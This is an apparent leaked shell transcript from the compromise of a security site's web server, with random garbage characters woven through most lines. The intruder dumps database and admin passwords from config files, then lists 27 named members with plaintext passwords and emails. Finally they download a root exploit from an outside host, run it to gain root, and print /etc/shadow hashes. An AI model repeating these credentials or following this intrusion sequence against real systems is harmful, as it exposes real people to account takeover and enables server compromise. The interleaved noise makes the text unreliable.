/ T: c0 O+ g W" v4 Ydrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0073 }% Z, D% N/ U! A O8 W
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
1 A# L$ L5 r' }2 [0 {drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
& D6 o! y+ J& a) Odrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
! o& `' b. j* ?' ydrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
- s& `) G, g$ B4 V" N# I- g% Z-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg, V1 I ?8 X) L
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config; M7 b3 d6 p; _6 m5 k/ t& w
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
2 B. D' t' E% z4 H9 l; r- wdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
; M+ K: i6 {$ x9 v7 I& L-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php- I ?$ _, `1 Y* a d) t; Q/ H
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico) h* `# m5 Z. w5 v& d9 W+ v
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
/ z8 k$ y% D3 V" _/ o) O8 R. Y5 vdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
. |% R( ? \# z8 {8 o }-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
0 c6 a7 k0 S; i8 y. u-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess+ g$ F& G$ m% P$ Z! ~
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php! V4 \1 h. c, t* v
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
+ E$ t$ `; L7 [6 m7 y8 s-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php0 x N5 N" m" j. S, U" F) Z3 [
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php! g4 i. G2 c( e6 q! A P5 V8 M& y& W6 ~
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
U) p3 P7 Z- z7 Ydrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc6 o7 a$ r; [9 M
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang# r9 [# Q- ~' t, T- x
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
& O( z: A p x- Hdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log9 ]1 d6 }/ G$ f5 K& z+ O" E
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
7 F1 M, M4 A6 a: P* P4 p- `drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
* y' T; k- h; L( Gdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
1 P+ P) r1 M9 M7 L7 t-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf( Z8 O, } ?7 [! [% X) \* t7 T
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
7 e' w9 O7 i9 E-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt* M* V0 S. f, c8 h t" ^3 y
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss, \7 u% D4 M; @' {
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources. Z% {( R$ s$ f0 N7 J: ?
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com: Q& {; S, a4 H$ j
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes4 i4 `5 a( G" \2 r9 c6 @
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src' h2 w# b& S! A X2 Q9 x0 x
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
8 r) i) m: B$ }( ndrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2! H" @ Q1 \- B( A% E
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
4 O1 a/ S5 M5 @-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
- O; ]+ D, H- \) w) U: ]7 x3 ?drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
2 I& C! w# ]3 G. k% o5 S7 K% s" E e; Q" k$ z
sh-3.2$ head -20 index.php% ]! {" X, f/ ^' d" i# f$ Q
<?PHP
/ d/ ^: i- Y9 a' m2 ]; I! y! N8 y/**2 h: C9 a h- h4 A6 v; o0 Z
* Mainfile (external) for astalavistaNET v2.0
* ?9 [6 ]8 U, s/ K4 I/ ^3 W*
l4 S1 x8 P+ E9 L' i! V0 y* @copyright Astalavista IT Engineering GmbH5 n; v# q I' p W7 r
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>4 i! ^8 r. f: P6 U1 D
* @version 1.09 @ K- |2 J. X# X( @! Z4 u
*/& _* k4 p1 D+ i+ ^! k, s2 T1 _
0 v, m: m: x6 G
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {: z; Q, p7 E( i# `( n
$dontStartSession = false;% L( M9 L: M4 [
} else {
4 w7 \1 E+ w' u) m, \! e $dontStartSession = true;
# D1 z% j0 R7 `3 u+ z' ? }0 ~; N! A5 q8 e3 R
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
: [3 K' G9 m6 L( u$ a- I require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
* E5 t9 {, _3 K6 O require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);9 k/ X2 j5 ~( ^& i8 M5 L% a" l
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);# l' H3 F/ I! z- H |0 t# w
$ n3 S p6 F* f6 V
sh-3.2$ cd config
4 t7 e" b, [6 b2 g. ush-3.2$ ls -la1 i/ X- u2 E- |
total 32
; T' ]* W K+ Z# @, gdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
4 f- K; }( g- X" C) D6 [drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., a# X8 G7 e! n- W2 m
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php+ ]5 h( i# [# d1 U. f. ]
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
2 s, K0 E9 V9 W2 w3 G! q-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
4 [* Z+ |3 V% k6 p5 m-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php9 [- i( h! I8 J; f
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
1 V' [7 w+ F( T$ q! ^! m4 f$ I+ V* K0 E7 I; h3 s+ r& j. a
sh-3.2$ cat com.conf.php
7 m$ T2 V1 H7 J2 F[snip]
+ E( G& u, Y8 o//member-database
* B. G) T: [1 w$_CONFIG['db_mem_server'] = ‘localhost’;; ]1 u" y' q+ ~% Y1 }
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
: ^4 ~: T" i" Z& L9 p0 i( l+ m+ j$_CONFIG['db_mem_user'] = ‘astanet_db’;
+ ]# P% O$ T/ H$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
: \, P1 o# i0 B% d6 {: B: q) Q$_CONFIG['db_mem_debug'] = false; //true or false' a* t- B; O6 s
//ads-database2 O7 J9 \- P+ {
$_CONFIG['db_ads_server'] = ‘localhost’;$ l; d4 \. Q' {9 C$ ~
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
7 }+ X4 U4 r& e$ z$_CONFIG['db_ads_user'] = ‘astanet_db’;7 s& Z5 L: F" C2 Y. o$ g6 ~
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;/ D4 z4 j; C. x+ i" T) U
$_CONFIG['db_ads_debug'] = false; //true or false
1 Q: M' S7 h4 N//rainbow-database
2 ^& ]! G# {3 H( @6 @% ^$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
7 A) I+ b; k5 [8 w$_CONFIG['db_rainbow_database'] = ‘rainbow’;
9 w9 w1 l9 c9 a; B a& J0 D$_CONFIG['db_rainbow_user'] = ‘dinu’;
; W& f- C5 _- `6 N' f8 [9 Y$_CONFIG['db_rainbow_password'] = ‘dinudinu’;- e* x( t$ k/ w( F
$_CONFIG['db_rainbow_debug'] = false; //true or false1 { \5 b! ?1 }, _) g
//mailing lists database
5 C( t8 L( B: z( T1 T `9 ?$_CONFIG['db_mailing_lists_server'] = ‘localhost’;/ P+ t# l$ F! t3 q/ S1 E
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
% X" s/ L3 Q+ p9 g0 t1 z- ~+ f" k: i. c$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
% [9 B. X6 N: `' m$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;& l& ]5 t- f" \4 K
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
9 ]: ]6 T- [" _4 O* }2 e: |/ k//paypal" d$ R6 n( C- M5 M e/ }* C& e& p
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
! _, V, e' L3 h) ]5 h. X3 [4 X# T$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
3 T* L! O/ I3 B" d! m9 h+ f$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;+ q6 M/ P/ i+ A# r0 ]
$_CONFIG['sub_pp_noship'] = ‘1′;
6 l8 d* d& w. w4 s0 p9 q3 i& J$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
- q- _ G6 F3 z* Q9 e! x" ]) _( y[snip], R' _! ]! E$ v3 u1 X* X" k0 i
& I/ V* S) Z' Y7 Rsh-3.2$ cd .., ]$ a% {- Z1 Z0 W" s' K
sh-3.2$ cd member% q+ W: E# I0 A0 \) X4 q2 s c
sh-3.2$ ls -la
F) k5 D8 y" T% D5 G% W, @# Ztotal 20, W) Z& R& [: r: c" _
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .1 D- n* @0 P, l) \0 r* |& u
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..7 j2 g% W: e% b2 }3 E5 q5 W
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
# o$ N8 @# P* ?5 r, x-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php& e: H" }- o7 g1 a7 m
sh-3.2$ cat .htaccess
8 y1 t' ^/ H- Y7 m0 HSecFilterEngine off( [. J4 I2 F f& q o- o
& G a6 P0 p1 ^/ c
sh-3.2$ cd ..
3 ^: i l4 N1 {% N$ X# Csh-3.2$ cd cron/ M! _' s# b+ ?9 K4 O
sh-3.2$ ls -la
* P8 S; q: W T5 m" ^/ d& vtotal 1688 _ q0 a0 _# a0 l3 N
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
( G! g3 U2 Q P$ ^drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
% ]1 w" E a/ F( ^; ~# t-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
0 T9 s. o" z1 `7 o; o6 b-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php# `+ D8 j. `% K
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
7 x9 b8 L& z1 y7 Y8 h& [' h7 r5 G-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php0 q3 c# L2 q/ U+ L' b# a! {, N4 B
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php5 [+ W# U! z* t% i3 v- l0 d
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php0 a9 v1 u+ p7 N/ Y+ E8 c: a
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
0 D- l! a$ }$ h. ~-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php8 Q! n$ u5 ]8 b1 @4 y7 ]* U
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh# w0 D# G) G' e, Q% ~
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
+ [4 b" s3 P; f# J9 T* g' L-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php$ a0 P2 U" F4 U% x6 c# d: y
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
" A* u+ K! _# B: n' |-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
# z/ y4 u4 `% S-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php: V2 V- i$ R0 K; `% G& n! o
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
1 t- x4 I% g. F% S-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
& {3 H: Y& D2 F1 n-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
/ T9 _6 J2 a6 a: ?8 U: }-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
: [9 l' b% B1 T: U5 i: Vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
/ P) x# y) g& M3 f6 F-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
- k) x; T% K6 c# I8 ]1 @, F T-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php8 P; d& m& G& z" z1 l
1 V* ~% m$ l m+ psh-3.2$ cd ..9 {" L2 d/ J7 U9 k* y- F9 G# y
sh-3.2$ cd _007
- l3 ^$ @2 c2 b7 d* L' z9 wsh-3.2$ ls -la+ V A. j4 E1 K0 m* F2 n# ~
total 24
m) ^5 ]8 ~3 z) r0 ~- C* Hdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .' T$ ~' K2 K" @2 o7 N
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..8 A8 x2 D. K- w! E( k
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess: R1 I8 H, F B0 C$ r7 l y1 Q1 F
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
+ R- u, A6 c" X2 |-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
: N: \5 S. K: g8 p7 R/ f4 x- X |drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap `- T* ]7 O e# T3 i
6 Y/ ], R' t! {# Q% g2 Q
sh-3.2$ cat .htaccess$ Z; n! S- B( a1 U( L
authType Basic
+ k2 A8 e$ b9 K) L, Z( VauthName Admin
8 L2 g4 p: S) A" @& v1 mauthUserFile /home/astanet/auth/.htadm_pwd
. R% Y& v" B3 A( frequire valid-user' ?* O* U( k; |7 Z6 L/ B
d3 M& W. W) O; a. ^4 E
sh-3.2$ cat /home/astanet/auth/.htadm_pwd' g3 I$ u" x: |& q4 l3 C
admin2net:CR0bl65MwhfT$ P3 J8 i! ^) R) d7 n
. c* A; d1 {9 O% _sh-3.2$ mysql -u astanet_db -p
; k$ L' G# ~4 R! M& J) ?Enter password:
/ C+ R$ _7 v7 {% F! ZWelcome to the MySQL monitor. Commands end with ; or \g.
- U( o- L' F' _5 I/ K; `1 c- oYour MySQL connection id is 275153
3 `. G9 _7 h+ {2 `9 Q m+ bServer version: 5.0.45-community-log MySQL Community Edition (GPL)
: D R) x9 g3 l$ c6 |, r% v4 }6 g f6 G& L* c0 N
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.5 o0 R) U n0 [/ Q2 a# W# \
+ Y" B. q5 q h: W1 t4 R; ?1 i N
mysql> show databases;, G2 W; G" i" F9 y% q2 f7 O+ |
+———————–+$ v* _: }4 p1 Q# M
| Database |2 }( F, [( C0 Y& Y9 I$ ^7 z( q
+———————–+/ {7 W. `- b" a% \% n7 l* r* ~" l
| information_schema |/ J) o, \4 E% L9 t; C5 L# ~
| astanet_ads |
" Z8 q; ]6 B( g6 v/ k/ n| astanet_mailing_lists |' s4 G1 }# j) A) G! h
| astanet_mediawiki |
8 Q9 _4 }: g0 @" Z| astanet_membersystem |
9 `5 V ^( U$ Y" c| test |
6 e+ K8 l% k8 Z: j( E+———————–+* h# i$ i2 c0 k, g! d
6 rows in set (0.00 sec)
8 r7 {9 E, w6 f- [! O
. B! [. K6 e4 f D: b, O' fmysql> use astanet_membersystem! z+ Q5 E$ q! F& F b5 b" Z" k
Database changed9 w- f$ E% u+ k
mysql> show tables;
: g: V" }2 _( N+ e" ~2 d+———————————–+
% r' Z8 S& Q: `) {% W( |1 Q z| Tables_in_astanet_membersystem |
& G. J( g( h6 V( R( e4 F+———————————–+
2 z" V# Y5 _! r0 }! S d! U7 m| blacklist_categories |3 V4 E* a5 M% y7 _
| blacklist_content |" j' c4 I1 }% Y2 m5 o
| blacklist_levels |
; Y( p8 n5 q' c; `| blacklist_mcset |# H& r: i) S* O0 I
| dir_categories |) }! q, I. U0 L4 ~* F
| dir_comments |$ P6 ~- L; r9 }+ E3 [7 e
| dir_links |
, ]* w( D$ e8 {: P6 [) w| dir_temp |
& j, w$ s+ Q/ e; _2 X| dir_votes |: f3 f+ r6 O& `1 w
| documents |
1 `7 X. ] Y# J% z$ t# Z| documents_categories |
( p% k, _4 D6 d, ?5 v) a4 o| email_content |
+ G% U* w+ k" @& d; o/ @| email_settings |) w& A/ t" A4 C3 o4 @" J2 E0 }
| exploits |
8 o7 p1 A: i+ M0 v/ {1 Y& g# Z| exploits_categories |
+ D$ \. f( B- }. _) r4 H: W6 y| exploittree_categories |# T% D, w8 f4 P, g& |4 J! ?! r
| exploittree_exploits |
* m9 t' _' }& e* ^ H% Q. m2 ]| home_values |
% J1 W1 X" b/ |0 S9 R| iso_countries |' G8 Q4 K- k( ^3 T. ^
| links_categories |
' q4 o8 E+ s' r4 p4 o4 b| links_records |
5 n+ E: Z+ L/ H- }+ I' Z| links_unauth |1 ?# w9 P1 T. @
| links_votes |/ F9 y8 s1 L4 B4 x# ~" J
| log |$ ]/ \# ^ _) g. @
| news_categories | P0 f: V0 a# {. Y: u
| news_comments |% n" Y V0 Q Q0 ~* l, X
| news_emoticons |* k" ~: q6 W0 a5 H$ h0 z% z
| news_latest |( c) f8 }( L5 Y$ m7 \
| news_messages |+ y) g# W+ D5 ] s' u
| news_statistics |/ t! M9 w- s6 t- ~8 u
| news_votes |
+ @5 N2 a! m8 w1 L8 v| prices_content |& s& W1 n) P8 I" ]5 {
| prices_offers |7 K! S0 p/ ], ^& W" R
| rss_settings |6 e& }. Q3 `3 ~- p1 |1 F
| sessions |
; y! }2 `) \, i/ O" _3 ]| stats_signups |
! i. p# ]8 v8 Q9 [7 K1 t| u2u2 |( E3 W1 |) X+ I$ c5 R( s( J
| u2u_contact |
" ]" n x0 S' f. z, w| u2u_settings |5 S# M8 P# z& I8 |* `. d
| user_keywords_selected_categories |
) u' l0 s1 u j5 N| users |2 g/ S9 J) @, w
| users_ipn_test |$ z* A* }2 f1 x0 u9 I" |
| users_keyword_values |4 [5 ~. J8 K: f3 P! B* ^
| users_profile |, P K) j( ]( m: a+ g
| users_temp |
* v. b6 K) Z9 h+ N2 o& ]| users_upgrade |. r. N3 D( v/ U" X" E
+———————————–+
9 a, A4 g, F+ U2 P5 h% P' Z% W" ?3 d46 rows in set (0.00 sec)6 s" t4 p6 Z H7 w' k4 I
7 }' v J o* L6 l$ V4 f
mysql> describe users;* @8 j7 z# k- z3 x
+————————–+————————————–+——+—–+———————+—————-+8 m4 a/ x" l9 \8 |: H' G
| Field | Type | Null | Key | Default | Extra |! [2 C+ }& m+ t( @- A8 l
+————————–+————————————–+——+—–+———————+—————-+
. |# j7 a8 l" A/ d0 F( k5 N* D& r7 B+ ~| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |3 U0 u# f H% c. a6 K( M# q
| user | varchar(50) | NO | | | |2 P4 N: w* R( ~! I' n5 n
| nickname | varchar(30) | NO | MUL | anonymous | |% i1 R) A& G+ }3 `( c: n. k
| password | varchar(30) | NO | | | |: y9 \5 N$ A% c8 ?
| userlevel | tinyint(3) | YES | MUL | NULL | |8 X! a) W4 Z% R! f z3 ~+ \: I
| exp | int(8) unsigned | NO | | 0 | |
' e* u8 r J2 S7 Q7 c4 _| email | varchar(50) | NO | | | |
% c- n# ~) C' k: q* D| ip | varchar(15) | NO | | 0 | |
, O! J# X# X1 Y| proxy | set(’0′,’1′) | NO | | 0 | |; u+ w3 \% ?0 u& j6 M3 \
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |( T3 K4 J3 t7 h: b
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |3 t9 L! P3 [/ D/ E
| anz_in | tinyint(1) | NO | | -1 | |% m9 Y n" G# H- h; n
| status | tinyint(1) unsigned | NO | | 0 | | k8 S+ B7 {; f( ]0 ?. U2 f9 X
| checked | set(’0′,’1′,’2′) | NO | | 0 | |+ F3 D( g# U A. |
| freemember | set(’0′,’1′) | NO | | 0 | |
- }- B! X Z0 k& E, U5 O| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
1 L: C: @3 T# t9 C1 W| lang | tinytext | NO | | | |7 |8 _4 P4 w' i$ ?% T/ t
| adid | smallint(6) | NO | | 0 | |
6 c# s9 M% P( T! H| pp_txn_id | varchar(255) | YES | | NULL | |
. Y, @" e& E. M. j) e9 ~| cnb_transaction_id | varchar(255) | YES | | NULL | |
3 w, s2 R( h* _+ C6 k: n+ p% J| cnb_order_id | varchar(255) | YES | | NULL | |& w8 K0 J. W& n9 C' {
| cnb_user_id | int(11) | YES | | 0 | |
% t/ V7 _4 [1 O" Z+————————–+————————————–+——+—–+———————+—————-+
$ K( ]1 ]/ n5 T* E8 l w0 u22 rows in set (0.01 sec)
& r; ^5 Z2 C5 L1 }. n
" z/ R Q" y) B* @ b' pmysql> select count(*) as skids from users;3 y7 R! z8 E) j8 y8 g; R
+——-+
5 X7 L+ ?4 v0 @9 n9 b| skids |
8 {$ G. [; s8 g( _: y* x( P+——-+' g3 U# |2 F0 Q: ?8 X4 t
| 25199 |) ?+ @3 I, }3 I1 z5 h6 R7 h
+——-+
" p9 k3 g. p( d$ I1 k1 row in set (0.00 sec)
0 M L) E/ \3 _& G2 |& _: L! y. e1 Q7 O" L
mysql> select user,nickname,password,email from users where userlevel = 1;
4 _! f- A: W ?8 j$ x8 z% u+————————–+———————-+——————+———————————–+8 U: ^# e* k- ^
| user | nickname | password | email |
7 v# k# n- t5 \# [+————————–+———————-+——————+———————————–+
( q, J0 v# P! V' y| pascal | prozac | astaman3 | 链接标记info@astalavista.net |) d# W+ r+ c* q& l. `, H6 m, t
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
5 L3 e$ }2 `4 K& x' `| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |# W- I! Y* n1 M) V1 b9 S
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |7 V- N1 ^6 ]" F# m6 S; i" ^3 D/ e9 t7 b
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |4 [. f) b1 l1 C# b. b+ M, U& {
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |* N# l P/ r% x7 F0 e4 Q
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
' c: C4 }" d- g a3 @0 H* ?4 s( ^| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
3 x- K9 B9 R$ v+ y0 m% @| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |% n" A6 S( K4 r( u' o: u/ a; ]
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
" C" n5 F0 z0 @* `: I' P% s. L| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |, Y' v7 H! _1 _4 J( d
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |/ n7 [& @9 P1 o9 P2 n+ P# M5 P ^
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
& R% v# R$ p, F| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |- j3 v9 ?, ~( r' K' F5 T4 N
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
5 R# C. a: i! s; L3 J* V% _| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
2 A5 C% g* w. O# S# ~/ b8 X| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |0 I: L3 q8 C8 V* {0 }
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |; V! _" N" L9 e. z" p; y
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
8 P8 a, P$ K& T$ P4 Q| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |% ]; q, h+ q2 x2 O# T; M# c+ S7 f
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |% n6 L* Z% K" y2 L5 W+ n' C- a& d% U
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |( V- A( `* e, L+ Y
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
. O" p) y5 Y: f1 _| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |, V3 k! i1 o' X/ N2 J+ m
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |; c$ s1 k" l& [( M' l, x9 h+ p" _
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
, P8 G$ C( ]# ~8 A' b5 s5 N# e| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |. n. j& \2 o" ]
+————————–+———————-+——————+———————————–+1 X, p9 W! Q* U8 ~2 [4 B
27 rows in set (0.00 sec)) `' l0 h! s3 Y0 F. u% {8 {
1 U# t2 \% s2 ~' Ymysql> exit;
0 k+ B3 p% H+ i& IBye
/ |7 e- a' X! c0 ]- _: @
& I" p9 j" X. x8 o6 t T: M[~] plaintext passwords? yes,* x5 j/ L2 q! M' a$ }$ G
Those so called “security professionals” who charge you $6.66 / month to
' }6 H! C% _7 h# M9 ~: v+ rregister at their hack-proof portal, save your passwords in plaintext…4 ]) u4 d( o) i
brilliant!& P# t7 m3 N# C3 p% N/ Y1 ?& H8 q
( x; l5 W* h3 I. l4 c[~] This been fun but we want more.0 a3 U0 W$ ^5 p) M
0 k) {- Y8 C* M3 y" \
sh-3.2$ uname -a6 `7 }4 |. T* b4 v; N4 G0 y$ M7 B
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
& \! a5 e0 p% s9 n% {) c! Z2 osh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
7 n% T4 u+ c% J: r+ }$ y–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
, x3 N' ~# h8 t t; {' l1 b$ MResolving anti.sec.labs… 13.33.33.37
, W, F9 X% A X' W7 H% nConnecting to anti.sec.labs|13.33.33.37|:80… connected.' D# F+ z1 O9 K0 n* a
HTTP request sent, awaiting response… 200 OK
6 d% ~2 k* \- j9 o6 qLength: 18200 (18K) [text/plain]
% l1 Z& p. s# ~$ ISaving to: `g0troot’
# J; o( n" i4 [3 b
) u5 o+ F/ l R2 \100%[=========================================================================================================================================>] 18,200 58.6K/s in
" P0 T/ C, t. ^' j; t. D: V0.3s+ b: h" x, u" C( p
" X4 M& g, D8 Y
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]* k1 t. _0 \, T- |# ^$ \4 I
4 J K m% @; {( V! g: r. h% ~sh-3.2$ ./g0troot -i x86_64
1 i) C$ |+ [* ?1 ^: z[+] g0troot - anti.sec.labs) F/ N+ U6 {- V
[+] Target: 2.6.18-128.1.10.el5
- g1 `+ B6 u. n3 q, ~. V7 s/ N[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]8 I7 {- \7 z$ w' z2 b: b
$ e. a, ]. a S+ v[+] r00tr00t$ R2 i& G% o+ Z% h* z$ B
[~] Executing shell…$ { w' P. H [: F7 v. j
5 @ ^. G( H- s% }' ksh-3.2# id1 x3 s/ M D. [" X- T
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel): Z w- w9 V7 s! g. C
6 K1 m2 J+ N( T4 ^, {4 tsh-3.2# cat /etc/shadow
4 U# r) S. T% X; zroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
; O' ~/ Y% u( O D$ S' o[snip]
0 O4 s4 @3 o! J+ k$ e! z. I1 a1 sadmin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
6 x ]% S9 C2 V0 \jon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
2 R, B0 J* |: `6 r S4 E' lcom 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::9 T4 N2 {1 o1 s8 e
